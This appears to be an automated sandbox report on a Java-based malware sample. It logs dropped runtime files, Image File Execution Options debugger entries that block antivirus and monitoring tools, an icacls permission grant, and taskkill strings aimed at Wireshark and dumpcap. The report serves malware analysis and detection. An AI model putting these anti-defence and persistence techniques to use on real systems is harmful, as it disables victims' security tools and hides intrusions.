Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\SysWOW64\xcopy.exe

File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl

Jump to dropped file

Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Boot Survival

Creates a Image File Execution Options (IFEO) Debugger entry

Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe	Registry value created: svchost.exe

Creates an undocumented autostart registry key

Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Main.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Main.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7EmlPxy.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7EmlPxy.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OPSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OPSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scproxysrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scproxysrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiProxy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiProxy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiClient_Diagnostic_Tool.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiClient_Diagnostic_Tool.exe debugger

Changes image file execution options

Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Main.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7EmlPxy.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OPSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scproxysrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiProxy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiClient_Diagnostic_Tool.exe debugger

Uses cacls to modify the permissions of files

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SUPERANTISPYWARE.EXE
Source: javaw.exe, 00000001.00000002.2962226941.000000001545B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /FF
Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PTASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll	Jump to dropped file
